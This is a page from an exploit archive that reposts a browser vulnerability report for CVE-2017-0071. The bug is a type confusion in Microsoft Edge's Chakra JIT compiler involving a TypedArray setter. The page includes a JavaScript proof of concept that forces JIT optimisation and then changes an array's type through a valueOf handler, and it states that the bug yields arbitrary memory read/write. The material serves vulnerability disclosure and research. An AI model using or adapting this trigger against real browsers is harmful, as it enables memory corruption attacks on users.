Impacted by this exploit? Fix it here


JOB OFFER: Exploit Analyst (m/f)

Edit Report

Microsoft Edge Charkra Incorrect Jit OptimizationMicrosoft Edge: Chakra incorrect jit optimization with TypedArray setter. 

CVE-2017-0071


PoC:

"use strict";

function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c; <<<<----------------------- (1)
    a[1] = 2.2;
    a[0] = 2.3023e-320;
}

function main() {
    var a = [1.1, 2.2];
    var b = new Uint32Array(100);

    // force to optimize
    for (var i = 0; i < 0x10000; i++)
        func(a, b, i);

    func(a, b, {valueOf: () => {
        a[0] = {}; <<<<----------------------- (2)

        return 0;
    }});

    a[0].toString();
}

main();

In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion.

The attached PoC will reproduce arbitrary memory read/write.

Tested on Microsoft Edge 38.14393.0.0.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt


Comments?

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.